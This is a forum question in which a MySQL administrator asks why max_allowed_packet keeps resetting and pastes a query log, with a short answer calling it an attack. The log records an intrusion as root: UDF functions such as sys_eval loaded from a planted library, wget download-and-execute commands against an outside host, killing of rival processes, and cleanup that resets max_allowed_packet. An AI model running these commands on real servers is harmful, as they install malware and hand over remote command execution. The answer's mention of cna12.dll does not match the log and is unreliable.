mysqlmax-allowed-packet

max_allowed_packet is resetting to 1024 because some unknown application


Whenever I change max_allowed_packet, its getting reset after few hours. when I checked query log then I found following queries. But I am unable to figure out which application or process executes this queries. Does anyone know what is it about? or it is mysql itself?

161020  3:09:34   723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_set RETURNS int SONAME 'ptfuki32.so'
161020  3:09:35   723 Query CREATE FUNCTION sys_exec RETURNS int SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020  3:09:36   723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020  3:09:37   723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Quit  
          724 Connect   root@ip on mysql
161020  3:09:38   724 Query SHOW VARIABLES LIKE '%compile_os%'
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
161020  3:09:39   724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('killall -9 .sshd')
          724 Query select sys_eval('killall -9 .sh')
161020  3:09:40   724 Query select sys_eval('killall -9 and1')
          724 Query select sys_eval('killall -9 cisco')
          724 Query select sys_eval('killall -9 ciscoh')
          724 Query select sys_eval('killall -9 L24')
          724 Query select sys_eval('killall -9 L26')
161020  3:09:41   724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          724 Query select sys_eval('chmod 777 http://ip:5555;')
          724 Query select sys_eval('./http://ip:5555;')
          724 Query select sys_eval('kill str=`netstat -anept 2>/dev/null |grep -E ':(68866|7583|2222|10711|6009|10991|10771|7168|7668|36000|36001|25000|25001|25002)'|cut -d / -f 1`')
          724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
161020  3:09:42   724 Query select sys_eval('wget http://ip4:5555/v9mm;chmod 777 v9mm;./v9mm;')
          724 Quit  
          725 Connect   root@ip on mysql
          725 Query SHOW VARIABLES LIKE '%compile_os%'
161020  3:09:43   725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query FLUSH PRIVILEGES
          725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query FLUSH PRIVILEGES
161020  3:09:44   725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
          725 Query DROP FUNCTION IF EXISTS sys_get
          725 Query DROP FUNCTION IF EXISTS sys_set
161020  3:09:45   725 Query DROP FUNCTION IF EXISTS sys_exec
          725 Query DROP FUNCTION IF EXISTS sys_eval
          725 Query DROP FUNCTION IF EXISTS cmdshell
          725 Query set global log_bin_trust_function_creators=0
          725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
161020  3:09:46   725 Query SET GLOBAL log_bin_trust_routine_creators=0
          725 Query SET GLOBAL max_allowed_packet=1024
          725 Query FLUSH PRIVILEGES
          725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
          725 Query DROP FUNCTION IF EXISTS sys_get
161020  3:09:47   725 Query DROP FUNCTION IF EXISTS sys_set
          725 Query DROP FUNCTION IF EXISTS sys_exec
          725 Query DROP FUNCTION IF EXISTS sys_eval
          725 Query DROP FUNCTION IF EXISTS cmdshell
          725 Query set global log_bin_trust_function_creators=0
161020  3:09:48   725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
          725 Query SET GLOBAL log_bin_trust_routine_creators=0
          725 Query SET GLOBAL max_allowed_packet=1024
          725 Query FLUSH PRIVILEGES
          725 Quit

Solution

  • This seems someone has attacked my mysql server with sql injection. cna12.dll is malware file. check link below to prevent from such attacks https://malwaremusings.com/2013/02/14/how-to-protect-yourself-from-the-cna12-dll-mysql-attacks/